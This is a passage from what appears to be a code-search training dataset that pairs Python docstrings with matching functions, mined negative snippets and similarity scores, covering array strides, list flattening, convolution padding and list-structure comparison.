construction_key, construction_objs in construction_dict.iteritems():\n for construction in construction_objs:\n construction.apply_format(**format_vars)", "def format_pairs(\n items: typing.Iterable[typing.Tuple[TTextType, TTextType]]\n)-> typing.Iterator[TViewLine]:\n\n max_key_len = max((len(k[0]) for k in items), default=0)\n max_key_len = min((max_key_len, KEY_MAX), default=0)\n\n for key, value in items:\n if isinstance(key, bytes):\n\n key += b\":\"\n else:\n key += \":\"\n\n key = key.ljust(max_key_len + 2)\n\n yield [\n (\"header\", key),\n (\"text\", value)\n ]", "def blocks_iter(lines):\n type_ = None\n content = []\n termdef = re.compile(r\"^\\[([a-zA-Z_]+?)\\]$\")\n for line in lines:\n m = re.search(termdef, line)\n if m:\n if type_ != None and content:\n yield {\"type\": type_, \"content\": content[:]}\n type_ = m.group(1)\n content.clear()\n elif line.rstrip():\n content.append(line.rstrip())\n if content:\n yield {\"type\": type_, \"content\": content[:]}", "def print_all():\n\n for i, context in enumerate(CONTEXT_GROUP):\n print('Group #{0:d}'.format(i))\n\n charmap = context[\"charmap\"]\n assert charmap is None or isinstance(charmap, dict)\n\n for j, item in enumerate(StringGeneratorPascalStyle(context)):\n text = process_dakuten(get_text(item[1], charmap, None))\n print('{index:04X}:{address:06X}:{data}'.format(\n index=j,\n address=item[0],\n data=text))", "def _format_description(parser):\n for line in statemachine.string2lines(\n parser.description, tab_width=4, convert_whitespace=True):\n yield line", "def generador(*args):\t\r\n\tfor valor in args:\r\n\t\tyield valor **3, \"Ñereee\"", "def getDescr(names, formats):\n if not names:\n names = [item for item in makeNamesFromFormats(formats)]\n\n if type(formats) == str and type(names) == str:\n yield (names, formats)\n raise StopIteration\n\n if len(formats) != len(names):\n raise ValueError(\"\"\"The formats and names structure don't match!\"\"\")\n\n mix = zip(names, formats)\n i = getIter(mix)\n if not i:\n return\n\n try:\n (name, fmt) = i.next()\n while (name, fmt):\n if isinstance(name, str) and isinstance(fmt, str):\n yield (name, fmt)\n else:\n l = []\n for (a, b) in getDescr(name[1], fmt):\n l.append((a,b))\n yield (name[0], l)\n (name, fmt) = i.next()\n except StopIteration:\n pass", "def initFormat(self):\n self.formatList = []", "def to_iob(text: str, items: List[Instance]) -> List[str]:\n coding = [\"O\"] * len(text)\n for (s, e), label in items:\n b = f\"B-{label}\"\n i = f\"I-{label}\"\n coding[s] = b\n for x in range(s + 1, e):\n coding[x] = i\n\n return coding" ]
[ "0.59636045", "0.55950534", "0.5526537", "0.5526537", "0.5512344", "0.5512344", "0.5500678", "0.5500678", "0.54459256", "0.5404356", "0.54026484", "0.5386869", "0.5325779", "0.52617586", "0.52564883", "0.5248751", "0.5190863", "0.5118963", "0.50866807", "0.50587744", "0.505319", "0.50401896", "0.5019855", "0.5005864", "0.49884766", "0.49712908", "0.49700937", "0.49658278", "0.49511203", "0.49469626" ]
0.64417255
0
Calculate strides of a contiguous array. Layout is 'C' or 'F' (Fortran).
def strides_from_shape(ndim, shape, itemsize, layout): if ndim == 0: return () if layout == 'C': strides = list(shape[1:]) + [itemsize] for i in range(ndim-2, -1, -1): strides[i] *= strides[i+1] else: strides = [itemsize] + list(shape[:-1]) for i in range(1, ndim): strides[i] *= strides[i-1] return strides
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def strides_from_shape(ndim, shape, itemsize, layout):\n if ndim == 0:\n return ()\n if layout == 'C':\n strides = list(shape[1:]) + [itemsize]\n for i in range(ndim - 2, -1, -1):\n strides[i] *= strides[i + 1]\n else:\n strides = [itemsize] + list(shape[:-1])\n for i in range(1, ndim):\n strides[i] *= strides[i - 1]\n return strides", "def strides(self):\n return self.initial_value.strides", "def elemstrides(self):\n return tuple(s // self.itemsize for s in self.strides)", "def stride_depth(self):\n\t\treturn self.strides_shape_param('D')", "def get_loop_strides(loop_order, i):\r\n var = sub[\"lv%i\" % i]\r\n r = []\r\n for index in loop_order:\r\n # Note: the stride variable is not declared for broadcasted variables\r\n if index != 'x':\r\n r.append(\"%(var)s_stride%(index)s\" % locals())\r\n else:\r\n r.append('0')\r\n return r", "def _calc_slices(X):\n\n n_rows = X.shape[0]\n slices = [n_rows // comm.size for _ in range(comm.size)]\n count = n_rows % comm.size\n for i in range(count):\n slices[i] += 1\n\n return np.array(slices, dtype=np.int64)", "def strides_shape_param(self, param):\n\t\tindex = self.variables['strides_format'].index(param)\n\t\treturn self.variables['strides'].shape[index]", "def stride_width(self):\n\t\treturn self.strides_shape_param('W')", "def stride(self):\n\t\treturn self.strides_shape_param('W')", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def get_conv1d_output_size(input_size, kernel_size, stride):\n return ((input_size - kernel_size)//stride) + 1", "def num_conv_locations(input_shape, filter_shape, strides, padding):\n if len(input_shape) != 4 and len(input_shape) != 3:\n raise ValueError(\"input_shape must be length 4, corresponding to a Conv2D,\"\n \" or length 3, corresponding to a Conv1D.\")\n if len(input_shape) != len(filter_shape):\n raise ValueError(\"Inconsistent number of dimensions between input and \"\n \"filter for convolution\")\n\n if strides is None:\n if len(input_shape) == 4:\n strides = [1, 1, 1, 1]\n else:\n strides = [1, 1, 1]\n\n # Use negative integer division to implement 'rounding up'.\n # Formula for convolution shape taken from:\n # http://machinelearninguru.com/computer_vision/basics/convolution/convolution_layer.html\n if len(input_shape) == 3:\n if padding is not None and padding.lower() == \"valid\":\n out_width = -(-(input_shape[1] - filter_shape[0] + 1) // strides[1])\n else:\n out_width = -(-input_shape[1] // strides[1])\n\n return out_width\n else:\n if padding is not None and padding.lower() == \"valid\":\n out_height = -(-(input_shape[1] - filter_shape[0] + 1) // strides[1])\n out_width = -(-(input_shape[2] - filter_shape[1] + 1) // strides[2])\n else:\n out_height = -(-input_shape[1] // strides[1])\n out_width = -(-input_shape[2] // strides[2])\n\n return out_height * out_width", "def calc_pad_dims_2D(X_shape, out_dim, kernel_shape, stride, dilation=0):\n\tif not isinstance(X_shape, tuple):\n\t\traise ValueError(\"X_shape must be of type tuple\")\n\n\tif not isinstance(out_dim, tuple):\n\t\traise ValueError(\"out_dim must be of type tuple\")\n\n\tif not isinstance(kernel_shape, tuple):\n\t\traise ValueError(\"kernel_shape must be of type tuple\")\n\n\tif not isinstance(stride, int):\n\t\traise ValueError(\"stride must be of type int\")\n\n\td = dilation\n\tfr, fc = kernel_shape\n\tout_rows, out_cols = out_dim\n\tn_ex, in_rows, in_cols, in_ch = X_shape\n\n\t# update effective filter shape based on dilaltion factor\n\t_fr, _fc = fr * (d + 1) - d, fc * (d + 1) - d\n\tpr = int((stride * (out_rows - 1) + _fr - in_rows) / 2)\n\tpc = int((stride * (out_cols - 1) + _fc - in_cols) / 2)\n\tout_rows1 = int(1 + (in_rows + 2 * pr - _fr) / stride)\n\tout_cols1 = int(1 + (in_cols + 2 * pc - _fc) / stride)\n\n\t# add asymmetric padding pixels to right/bottom\n\tpr1, pr2 = pr, pr\n\tif out_rows1 == out_rows - 1:\n\t\tpr1, pr2 = pr, pr+1\n\telif out_rows1 != out_rows:\n\t\traise AssertionError\n\n\tif any(np.array([pr1, pr2, pc1, pc2]) < 0):\n\t\traise ValueError(\n\t\t\t\"padding cannot be less than 0. Get: {}\".format((pr1, pr2, pc1, pc2))\n\t\t\t)\n\treturn (pr1, pr2, pc1, pc2)", "def _get_same_padding_conv_nd(\n image_size: list[int], kernel_size: tuple[int, ...], dilation: tuple[int, ...], stride: tuple[int, ...]\n) -> list[int]:\n # get number of spatial dimensions, corresponds to kernel size length\n num_dims = len(kernel_size)\n\n # additional checks to populate dilation and stride (in case they are single entry tuples)\n if len(dilation) == 1:\n dilation = dilation * num_dims\n\n if len(stride) == 1:\n stride = stride * num_dims\n\n # equation to calculate (pad^+ + pad^-) size\n _pad_size: list[int] = [\n max((math.ceil(_i_s / _s) - 1) * _s + (_k_s - 1) * _d + 1 - _i_s, 0)\n for _i_s, _k_s, _d, _s in zip(image_size, kernel_size, dilation, stride)\n ]\n # distribute paddings into pad^+ and pad^- following Tensorflow's same padding strategy\n _paddings: list[tuple[int, int]] = [(_p // 2, _p - _p // 2) for _p in _pad_size]\n\n # unroll list of tuples to tuples, and then to list\n # reversed as nn.ConstantPadNd expects paddings starting with last dimension\n _paddings_ret: list[int] = [outer for inner in reversed(_paddings) for outer in inner]\n return _paddings_ret", "def compute_conv(in_size, kernel, stride, padding):\n return (in_size + 2 * padding - kernel) // stride + 1", "def calc_pad_dims_2D(X_shape, out_dim, kernel_shape, stride, dilation=0):\n if not isinstance(X_shape, tuple):\n raise ValueError(\"`X_shape` must be of type tuple\")\n\n if not isinstance(out_dim, tuple):\n raise ValueError(\"`out_dim` must be of type tuple\")\n\n if not isinstance(kernel_shape, tuple):\n raise ValueError(\"`kernel_shape` must be of type tuple\")\n\n if not isinstance(stride, int):\n raise ValueError(\"`stride` must be of type int\")\n\n d = dilation\n fr, fc = kernel_shape\n out_rows, out_cols = out_dim\n n_ex, in_rows, in_cols, in_ch = X_shape\n\n # update effective filter shape based on dilation factor\n _fr, _fc = fr * (d + 1) - d, fc * (d + 1) - d\n\n pr = int((stride * (out_rows - 1) + _fr - in_rows) / 2)\n pc = int((stride * (out_cols - 1) + _fc - in_cols) / 2)\n\n out_rows1 = int(1 + (in_rows + 2 * pr - _fr) / stride)\n out_cols1 = int(1 + (in_cols + 2 * pc - _fc) / stride)\n\n # add asymmetric padding pixels to right / bottom\n pr1, pr2 = pr, pr\n if out_rows1 == out_rows - 1:\n pr1, pr2 = pr, pr + 1\n elif out_rows1 != out_rows:\n raise AssertionError\n\n pc1, pc2 = pc, pc\n if out_cols1 == out_cols - 1:\n pc1, pc2 = pc, pc + 1\n elif out_cols1 != out_cols:\n raise AssertionError\n\n if any(np.array([pr1, pr2, pc1, pc2]) < 0):\n raise ValueError(\n \"Padding cannot be less than 0. Got: {}\".format((pr1, pr2, pc1, pc2))\n )\n return (pr1, pr2, pc1, pc2)", "def calc_conv_out_dims(X_shape, W_shape, stride=1, pad=0, dilation=0):\n\tdummy = np.zeros(X_shape)\n\ts, p, d = stride, pad, dilation\n\tif len(X_shape) == 3:\n\t\t_, p = pad1D(dummy, p)\n\t\tpw1, pw2 = p\n\t\tfw, in_ch, out_ch = W_shape\n\t\tn_ex, in_length, in_ch = X_shape\n\n\t\t_fw = fw * (d+1) - d\n\t\tout_length = (in_length + pw1 + pw2 - _fw) // s + 1\n\t\tout_dim = (n_ex, out_length, out_ch)\n\n\telif len(X_shape) == 4:\n\t\t_, p = pad2D(dummy, p)\n\t\tpr1, pr2, pc1, pc2 = p\n\t\tfr, fc, in_ch, out_ch = W_shape\n\t\tn_ex, in_rows, in_cols, in_ch = X_shape\n\n\t\t# adjust effective filter size to account for dilation\n\t\t_fr, _fc = fr * (d+1) - d, fc * (d+1) - d\n\t\tout_rows = (in_rows + pr1 + pr2 - _fr) // s + 1\n\t\tout_cols = (in_cols + pc1 + pc2 - _fc) // s + 1\n\t\tout_dims = (n_ex, out_rows, out_cols, out_ch)\n\telse:\n\t\traise ValueError(\"unrecognized number of the input dims: {}\".format(len(X_shape)))", "def dtype_stride( dtype, name = None ):\n if name:\n return dtype[ name ].itemsize\n else:\n return dtype.itemsize", "def _get_strides_and_dilation_rate(num_spatial_dims, strides, dilation_rate):\n if dilation_rate is None:\n dilation_rate = [1] * num_spatial_dims\n elif len(dilation_rate) != num_spatial_dims:\n raise ValueError(f\"`len(dilation_rate)` should be {num_spatial_dims}. \"\n f\"Received: dilation_rate={dilation_rate} of length \"\n f\"{len(dilation_rate)}\")\n dilation_rate = np.array(dilation_rate, dtype=np.int32)\n if np.any(dilation_rate < 1):\n raise ValueError(\"all values of `dilation_rate` must be positive. \"\n f\"Received: dilation_rate={dilation_rate}\")\n\n if strides is None:\n strides = [1] * num_spatial_dims\n elif len(strides) != num_spatial_dims:\n raise ValueError(f\"`len(strides)` should be {num_spatial_dims}. \"\n f\"Received: strides={strides} of length {len(strides)}\")\n strides = np.array(strides, dtype=np.int32)\n if np.any(strides < 1):\n raise ValueError(\"all values of `strides` must be positive. \"\n f\"Received: strides={strides}\")\n\n if np.any(strides > 1) and np.any(dilation_rate > 1):\n raise ValueError(\n \"`strides > 1` not supported in conjunction with `dilation_rate > 1`. \"\n f\"Received: strides={strides} and dilation_rate={dilation_rate}\")\n return strides, dilation_rate", "def divide_with_stride(arr: np.ndarray) -> List[np.ndarray]:\n\n result_list: List[np.ndarray] = []\n # slice by z axis\n for z in range(0, z_len := arr.shape[0], 16):\n if z + 31 >= z_len:\n z = z_len - 16\n z_arr: np.ndarray = arr[z:z+16]\n\n # slice by y axis\n for y in range(0, y_len := arr.shape[1], 16):\n y_arr: np.ndarray = z_arr[:, y:y+16]\n\n # slice by x axis\n for x in range(0, x_len := arr.shape[2], 16):\n x_arr: np.ndarray = y_arr[:, :, x:x+16]\n if len(set(x_arr.shape)) == 1 and x_arr.shape[0] == 16:\n result_list.append(x_arr)\n \n return result_list", "def conv_output_shape(\n h_w: Tuple[int, int],\n kernel_size: int = 1,\n stride: int = 1,\n pad: int = 0,\n dilation: int = 1,\n ):\n h = floor(\n ((h_w[0] + (2 * pad) - (dilation * (kernel_size - 1)) - 1) / stride) + 1\n )\n w = floor(\n ((h_w[1] + (2 * pad) - (dilation * (kernel_size - 1)) - 1) / stride) + 1\n )\n return h, w", "def out_stride(self):\n return 4", "def get_strides(onnx_node): # type: (NodeWrapper) -> Tuple[int, int, int]\n str_h, str_w, str_d = 1, 1, 1 # default values\n strides = onnx_node.get_attribute_value('strides', ()) # stride along each axis\n\n if len(strides) == 2: # ONNX input axes order NCHW\n str_h, str_w = strides\n elif len(strides) == 3: # ONNX input axes order NCHWD\n str_h, str_w, str_d = strides\n\n return str_h, str_w, str_d", "def get_conv_rows_cols(height, width):\n dims = [height, width]\n for i in range(len(dims)):\n # (3, 3) zeropad\n dims[i] += 6\n for filter_size in [7, 3, 1, 1]:\n # all strides use valid padding, formula is (W - F + 2P) / S + 1\n dims[i] = (dims[i] - filter_size) // 2 + 1\n\n return dims", "def contiguousInds(args):\n condition = (np.array(args) > 0.0)\n\n # Find the indicies of changes in ``condition``\n dd = np.diff(condition)\n idx, = dd.nonzero()\n\n # Start things after change in ``condition``, thus shift indices 1 rightward\n idx += 1\n\n # If the start is True prepend a 0\n if condition[0]: idx = np.r_[0, idx]\n\n # If the end is True, append the length of the array\n if condition[-1]: idx = np.r_[idx, condition.size]\n\n # Reshape the result into two columns\n idx.shape = (-1, 2)\n\n # Find lengths of each contiguous segment\n sizes = np.diff(idx, axis=1)\n # Find the location of maximum segment length\n maxPos = np.argmax(sizes)\n # Make indices spanning longest segment\n inds = np.arange(*idx[maxPos])\n\n return inds", "def calc_pad_dims_1D(X_shape, l_out, kernel_width, stride, dilation=0, causal=False):\n\tif not isinstance(X_shape, tuple):\n\t\traise ValueError(\"X_shape must be type tuple\")\n\n\tif not isinstance(l_out, int):\n\t\traise ValueError(\"l_out must be type int\")\n\n\tif not isinstance(kernel_width, int):\n\t\traise ValueError(\"kernel_width must be type int\")\n\n\tif not isinstance(stride, int):\n\t\traise ValueError(\"stride must be type int\")\n\n\td = dilation\n\tfw = kernel_width\n\tn_ex, l_in, in_ch = X_shape\n\n\t# update effective filter shape based on dilation factor\n\t_fw = fw * (d + 1) - d\n\ttotal_pad = int((stride * (l_out - 1) + _fw - l_in))\n\n\tif not causal:\n\t\tpw = total_pad // 2\n\t\tl_out1 = int(1 + (l_in + 2 * pw - _fw) / stride)\n\n\t\t# add asymmetric padding pixels to right / bottom\n\t\tpw1, pw2 = pw, pw\n\t\tif l_out1 == l_out - 1:\n\t\t\tpw1, pw2 = pw, pw + 1\n\t\telif l_out1 != l_out:\n\t\t\traise AssertionError\n\n\tif causal:\n\t\t# if this is a causal convolution, only pad the left side of \n\t\t# the sequence\n\t\tpw1, pw2 = total_pad, 0\n\t\tl_out1 = int(1 + (l_in + total_pad - _fw) / stride)\n\t\tassert l_out1 == l_out\n\n\tif any(np.array([pw1, pw2]) < 0):\n\t\traise ValueError(\"padding cannot be less than 0, Got: {}\".\\\n\t\t\tformat((pw1, pw2)))\n\treturn (pw1, pw2)", "def same_nd(shape, stride, kernel_size):\n\n rshape = []\n for sh, st, sz in zip(shape, stride, kernel_size):\n rshape.append(int(same_x(sh, st, sz)))\n return rshape", "def make_padding(kernel_size, stride, dilation):\n return -((-kernel_size - (kernel_size - 1) * (dilation - 1)) // stride + 1) // 2", "def get_stride(resnet_unit_id, block_id):\n if resnet_unit_id == 0 or block_id != 0:\n return 1\n else:\n return 2", "def conv2d(\n input: np.ndarray,\n weight: np.ndarray,\n bias: np.ndarray = None,\n stride: int = 1,\n padding: int = 0,\n groups: int = 1,\n dilation: int = 0,\n) -> np.ndarray:\n if input.ndim == 3:\n input = np.expand_dims(input, axis=0)\n assert dilation == 0, \"dilation > 0 not supported yet.\"\n assert input.ndim == weight.ndim\n assert weight.shape[1] * groups == input.shape[1]\n if bias is None:\n bias = np.zeros((weight.shape[0],))\n assert weight.shape[0] == bias.shape[0]\n assert weight.shape[2] == weight.shape[3], \"non-equal kernel size not supported\"\n C_out, _, K, _ = weight.shape\n padded_input = np.pad(\n input, ((0, 0), (0, 0), (padding, padding), (padding, padding)), constant_values=0.0\n )\n N, C_in, H, W = padded_input.shape\n C_in_grp = C_in // groups # C_in group size\n C_out_grp = C_out // groups # C_out group size\n out = []\n for g in range(groups):\n input_g = padded_input[:, g * C_in_grp : (g + 1) * C_in_grp]\n weight_g = weight[g * C_out_grp : (g + 1) * C_out_grp, ...]\n bias_g = bias[g * C_out_grp : (g + 1) * C_out_grp]\n out_g = np.zeros((N, C_out_grp, (H - K + 1) // stride, (W - K + 1) // stride))\n for i in range((H - K + 1) // stride):\n for j in range((W - K + 1) // stride):\n si, sj = stride * i, stride * j\n input_block = input_g[:, None, :, si : si + K, sj : sj + K]\n out_g[:, :, i, j] = (input_block * weight_g).reshape(N, C_out_grp, -1).sum(\n axis=2\n ) + bias_g[None, :]\n out.append(out_g)\n return np.concatenate(out, axis=1)" ]
[ "0.6671998", "0.6667623", "0.63901645", "0.62995565", "0.6209812", "0.62079126", "0.6108434", "0.60595614", "0.60080725", "0.5996222", "0.5996222", "0.5860129", "0.57919973", "0.57440704", "0.56975204", "0.56885684", "0.56631756", "0.5634464", "0.56175673", "0.5605618", "0.55762684", "0.5570212", "0.55302495", "0.55226046", "0.5513745", "0.55130106", "0.5503428", "0.5492651", "0.54516816", "0.5423718" ]
0.6674238
0
flatten list or return scalar
def flatten(lst): if atomp(lst): # scalar return lst return _flatten(lst)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lflatten(*lst):\n return flatten(list(lst))", "def _flatten_one(x):\n return x[0] if is_iterable(x) else x", "def flatten(x): # przerobić na lambda?\n if x==[]:\n return None\n else:\n return x[0]", "def flatten():", "def flatten(lst):\n if atomp(lst):\n return lst\n return _flatten(lst)", "def list_flatten(input_list):\n if len(input_list) > 0 and isinstance(input_list[0], (list, np.ndarray)):\n return functools.reduce(operator.iconcat, input_list, [])\n\n return input_list", "def flatten(lst):\n \"*** YOUR CODE HERE ***\"", "def do_flatten(obj):\n if type(obj) == list:\n return np.array(obj).flatten()\n return obj.flatten()", "def flatten(ls):\n return sum(ls, [])", "def flatten(vec):\n return [ [v for v in z] for z in vec][0]", "def _flatten_list(x):\n return list(chain.from_iterable(x))", "def flatten(items):\n if isinstance(items, (numbers.Number, six.string_types)):\n return items\n return list(lazy_flatten(items))", "def flatten_list(alist):\n return list(flatten_list_gen(alist))", "def flatten(self):\n if self.data:\n def flat(l):\n ans=[]\n for i in l:\n if type(i)==list:\n ans.extend(flat(i))\n else:\n ans.append(i)\n return ans\n return flat(self.data)\n else:\n return []", "def flatten(*args):\n return _flatten(args)", "def flatten_list(result_set):\n return sum(list(result_set), [])", "def flatten(list):\n\n if isinstance(list, collections.Iterable) and not isinstance(list, (str, bytes)):\n return [a for i in list for a in flatten(i)]\n else:\n return [list]", "def flatten(xss):\n return chain.from_iterable(xss)", "def flatten(nested_list):\r\n return list(chain.from_iterable(nested_list))", "def flatten(lst):\n assert (isinstance(lst, list)), \"Argument must be an list\"\n\n for i in lst:\n \t# print(i)\n \tif type(i) == list:\n \t\tflatten(i)\n \telse:\n \t\tuniversal_lst.append(i)\n return universal_lst", "def flatten(lst):\n out = []\n for v in lst:\n if v is None: continue\n if isinstance(v, list):\n out.extend(flatten(v))\n else:\n out.append(v)\n return out", "def fast_flatten(items):\n if isinstance(items, (numbers.Number, six.string_types)):\n return items\n\n try:\n items = convert_tensor_to_numpy(items)\n except Exception:\n LOGGER.debug(\"unable to convert tensor; continuing\", exc_info=True)\n\n if HAS_NUMPY:\n try:\n # Vector, Matrix conversion:\n items = numpy.array(items, dtype=float)\n # Return numpy array:\n return items.reshape(-1)\n except Exception:\n try:\n # Uneven conversion, 2 deep:\n items = numpy.array([numpy.array(item) for item in items], dtype=float)\n return items.reshape(-1)\n except Exception:\n # Fall through\n LOGGER.debug(\n \"numpy unable to convert items in fast_flatten\", exc_info=True\n )\n return numpy.array(flatten(items))\n else:\n log_once_at_level(\n logging.INFO, \"numpy not installed; using a slower flatten\",\n )\n return flatten(items)", "def _flatten(x: Sequence) ->list:\n return [item for sublist in x for item in sublist]", "def test_scalar(self) -> None:\n result = flatten('xyz')\n self.assertEqual(result, ['xyz'], result)", "def flatten(box: list) -> list:\n if len(box) == 1:\n result = flatten(box[0]) if type(box[0]) == list else box\n elif type(box[0]) == list:\n result = flatten(box[0]) + flatten(box[1:])\n else:\n result = [box[0]] + flatten(box[1:])\n return result", "def flatten(llst):\n res = []\n for lst in llst:\n res += lst\n return res", "def _flatten_list(input_list: Any) -> List[int]:\n flattened_list = []\n for element in input_list:\n if isinstance(element, list):\n flattened_list += _flatten_list(element)\n else:\n flattened_list.append(element)\n return flattened_list", "def flatten(a):\r\n if isinstance(a, (tuple, list, set)):\r\n l = []\r\n for item in a:\r\n l.extend(flatten(item))\r\n return l\r\n else:\r\n return [a]", "def flatten(self) -> List:\n if self.children == []:\n return [self.value]\n else:\n return ([self.value]\n + sum([c.flatten()\n for c in self.children], []))", "def flatten(l: iter):\n return functools.reduce(lambda x, y: x + y, l)" ]
[ "0.7351641", "0.7303014", "0.71548724", "0.7148735", "0.7075203", "0.69926786", "0.6866925", "0.68362427", "0.68152994", "0.6766912", "0.67421544", "0.6731956", "0.66912895", "0.66828746", "0.6666743", "0.6657045", "0.6656961", "0.66309655", "0.66255593", "0.6615", "0.6612183", "0.658197", "0.6566865", "0.65406513", "0.64364433", "0.6419373", "0.6396802", "0.63942176", "0.6364172", "0.63513696" ]
0.83005923
0
Compare the structure of llst[lslices] and rlst[rslices].
def cmp_structure(llst, rlst, lslices, rslices): lshape = slice_shape(llst, lslices) rshape = slice_shape(rlst, rslices) if (len(lshape) != len(rshape)): return -1 for i in range(len(lshape)): if lshape[i] != rshape[i]: return -1 if lshape[i] == 0: return 0 return 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cmp_structure(llst, rlst, lslices, rslices):\n lshape = slice_shape(llst, lslices)\n rshape = slice_shape(rlst, rslices)\n if len(lshape) != len(rshape):\n return -1\n for i in range(len(lshape)):\n if lshape[i] != rshape[i]:\n return -1\n if lshape[i] == 0:\n return 0\n return 0", "def compare(self,l):\r\n\t\t\r\n\t\t# assume equality\r\n\t\tq = True\r\n\t\t\r\n\t\t# test term by term\r\n\t\tfor i,j in zip(self,l):\r\n\t\t\t\r\n\t\t\t# break at first mismatch\r\n\t\t\tif not i.compare(j):\r\n\t\t\t\tq = False\r\n\t\t\t\tbreak\r\n\t\t\t\t\r\n\t\t# make sure lengths are also equal\r\n\t\tif len(self) != len(l):\r\n\t\t\tq = False\r\n\t\t\t\t\r\n\t\treturn q", "def _compare_list(self, name, actual, expect):\n self.op_test.assertListEqual(\n actual.recursive_sequence_lengths(),\n expect[1],\n \"Output (\" + name + \") has different lod at \" + str(place),\n )", "def test_align_lst_shapes_equal():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n test_uv_2 = copy.deepcopy(test_uv)\n ra_range = [0, 12]\n\n test_uv_out, test_uv_2_out = utils.lst_align(\n test_uv,\n test_uv_2,\n ra_range=ra_range,\n inplace=False,\n )\n\n assert test_uv_out.time_array.shape == test_uv_out.time_array.shape", "def wvlsort(self,s,irrad):\n iwvls = self.iwvls\n if sorted(iwvls) is iwvls:\n print( '*** wvls are already sorted, there may be a problem! ***')\n if 'sp' in s:\n if self.verbose: print( 'in sp')\n if self.verbose: print( s['sp'].shape)\n ui = [i for i in range(s['sp'].ndim) if s['sp'].shape[i] == len(self.wvl)]\n if 1 in ui:\n sp = s['sp'][:,iwvls,:,:,:]\n else: \n raise LookupError\n if 'rads' in s:\n if self.verbose: print( 'in rads')\n if self.verbose: print( s['rads'].shape, s['rads'].ndim, len(iwvls))\n ui = [i for i in range(s['rads'].ndim) if s['rads'].shape[i] == len(self.wvl)]\n #print ui\n if 1 in ui:\n if self.verbose: print( '1 in ui')\n sp = s['rads'][:,iwvls]\n else: \n if self.verbose: print( 'not 1 in ui')\n sp = s['rads'][iwvls,:]\n if 'iset' in s:\n if s['iset'].ndim>1:\n self.iset = s['iset'][:,0]\n else:\n self.iset = s['iset']\n else:\n print( '** Problem, rads present (radiance subset), but not the subset integers **')\n elif 'rad' in s:\n if self.verbose: print( 'in rad')\n if self.verbose: print( s['rad'].shape, s['rad'].ndim, len(iwvls))\n ui = [i for i in range(s['rad'].ndim) if s['rad'].shape[i] == len(self.wvl)]\n #print ui\n if 1 in ui:\n if self.verbose: print( '1 in ui')\n sp = s['rad'][:,iwvls]\n else: \n if self.verbose: print( 'not 1 in ui')\n sp = s['rad'][iwvls,:]\n self.iset = np.where(s['rad'][:,0])[0]\n if irrad:\n if self.verbose: print( 'in irrad')\n ui = [i for i in range(s['sp_irrdn'].ndim) if s['sp_irrdn'].shape[i] == len(self.wvl)]\n if 1 in ui:\n self.sp_irrdn = s['sp_irrdn'][:,iwvls,:,:,:]\n self.sp_irrup = s['sp_irrup'][:,iwvls,:,:,:]\n else: \n raise LookupError\n self.sp = sp", "def test_merge_list_same(short_ll, small_ll):\n assert ml(short_ll, small_ll) == 8\n assert len(small_ll) == 8", "def compareIndexes(rrs,ccs,rrOlds,ccOlds):\n\n # create a better way of doing this\n #newArr = np.vstack([rr,cc])\n #oldArr = np.vstacl([rrOld,ccOld])\n\n iterCount = 0\n toDelete = []\n\n for rr, cc in zip(rrs,ccs):\n for rrOld, ccOld in zip(rrOlds,ccOlds):\n if rr == rrOld and cc == ccOld:\n toDelete.append(iterCount)\n break\n\n iterCount += 1\n\n\n rrMod = np.delete(rrs,toDelete)\n ccMod = np.delete(ccs,toDelete)\n\n return rrMod, ccMod, toDelete", "def entitycompare(l, r):\n l = l.file.split(b'/')\n r = r.file.split(b'/')\n nl = len(l)\n nr = len(r)\n n = min(nl, nr)\n for i in range(n):\n if i + 1 == nl and nl < nr:\n return -1\n elif i + 1 == nr and nl > nr:\n return +1\n elif l[i] < r[i]:\n return -1\n elif l[i] > r[i]:\n return +1\n return 0", "def has_match(trajs_0, trajs_1):\n for i in range(len(trajs_0)):\n for j in range(len(trajs_1)):\n R = (trajs_0[i].get_slice()[:,:2] == trajs_1[j].get_slice()[:,:2])\n if isinstance(R, bool):\n if R:\n return True \n elif R.all():\n return True \n else:\n pass \n return False", "def checkLists(self, l1, l2):\n self.assertListEqual(sorted(l1), sorted(l2))", "def _compare_list(self, name, actual, expect):\n with fluid.dygraph.base.guard(place=place):\n self.op_test.assertListEqual(\n actual.value()\n .get_tensor()\n .recursive_sequence_lengths(),\n expect[1],\n \"Operator (\"\n + self.op_type\n + \") Output (\"\n + name\n + \") has different lod at \"\n + str(place)\n + \" in dygraph mode\",\n )", "def almostEqualList(self, l1:List[float], l2:List[float], margin:float):\r\n ret = False\r\n for i in range(0,len(l1)):\r\n diff = abs(l1[i] - l2[i])\r\n if diff < margin:\r\n ret = True\r\n else:\r\n return False\r\n return ret", "def __le__(self, other):\n if type(self) is not type(other) or len(self) != len(other):\n raise TypeError(\"these are not comparable\")\n if self.runs == other.runs:\n return True\n\n # r1 must have less runs than r0\n if len(other.runs) > len(self.runs):\n return False\n\n dico1 = other.run_indices\n\n # conversion: index of run in r0 -> index of run in r1\n dico0 = [None] * len(self.runs)\n for i, bloc in enumerate(self.runs):\n j0 = dico1[bloc[0]]\n for k in bloc:\n if dico1[k] != j0:\n return False\n dico0[i] = j0\n\n # at this point, the set partitions given by tuples are comparable\n dg0 = self.spg\n dg1 = other.dpg\n\n for i, j in dg0.edge_iterator(labels=False):\n if dico0[i] != dico0[j] and not dg1.has_edge(dico0[i], dico0[j]):\n return False\n return True", "def _compare_structure(sample, reference):\n paths = MappingValidator._find_all_paths(reference)\n result = True\n for path in paths:\n result = result and MappingValidator._validate_key(sample, path)\n if not result:\n break\n return result", "def compare(self):\n len0 = len(self.cluster_lists[0])\n len1 = len(self.cluster_lists[1])\n longer_index = 0 if len0 >= len1 else 1\n shorter_index = 1 if len1 <= len0 else 0\n self.stars_length = len(self.cluster_lists[shorter_index]) \n self.starlets_length = len(self.cluster_lists[longer_index]) \n # build the noeds for shorter cluster list, and get the\n # distribution of cluster size.\n for cluster in self.cluster_lists[shorter_index]:\n len_spectra = len(cluster.get_spectra())\n star = ClusterNode(cluster.id, len_spectra) \n self.stars[cluster.id] = star\n\n self.cluster_spectra_num[shorter_index] += len_spectra\n self.cluster_size_dist[shorter_index][len_spectra] = 